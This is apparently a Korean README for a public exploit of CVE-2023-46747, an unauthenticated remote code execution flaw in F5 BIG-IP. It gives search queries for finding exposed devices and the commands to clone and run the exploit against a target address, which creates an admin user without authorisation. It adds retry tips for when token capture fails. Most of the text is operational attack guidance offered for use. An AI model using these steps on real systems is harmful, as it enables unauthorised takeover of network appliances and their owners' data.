CVE 2023 46747 RCE

 (title="BIG-IP®" || icon_hash="-335242539")

 title:"BIG-IP®"

https://my.f5.com/manage/s/article/K000137353

1. 현재 여기 사용자는 admin 뿐입니다.

2. 스크립트를 실행합니다.

 git clone https://github.com/W01fh4cker/CVE-2023-46747-RCE.git
cd CVE-2023-46747-RCE
pip install -r requirements.txt
python CVE-2023-46747-RCE.py -u https://192.168.161.190
# python CVE-2023-46747-RCE.py -u https://192.168.161.190 -p http://127.0.0.1:7890

성공적으로 실행된 명령:

3. 여기에서 승인 없이 새 사용자가 성공적으로 생성되었습니다.

일부 버전에서는 악용이 실패합니다. https://twitter.com/joel_land/status/1729147886615818732를 참조하세요.

1. Q: 토큰 획득에 실패했나요?
   A: 인증 없이 사용자를 생성하는 것은 100% 성공하지 않기 때문에 테스트 사이트에 취약점이 없다고는 할 수 없습니다. 어떤 이유로 첫 번째 단계에서 사용자를 생성하지 않아 두 번째 단계에서 토큰을 얻을 수 없는 경우가 있습니다. 그러므로 제가 제안하는 것은 몇 번 더 시도해 보는 것입니다. 작동하지 않는다면 실제로 취약점이 없다는 의미일 수 있습니다.

이 스크립트(https://github.com/BishopFox/bigip-scanner)를 사용하여 F5 BIG-IP 버전 정보를 수집할 수 있습니다. 훌륭해요!

프로젝트발견/핵-템플릿#8500
https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg
https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747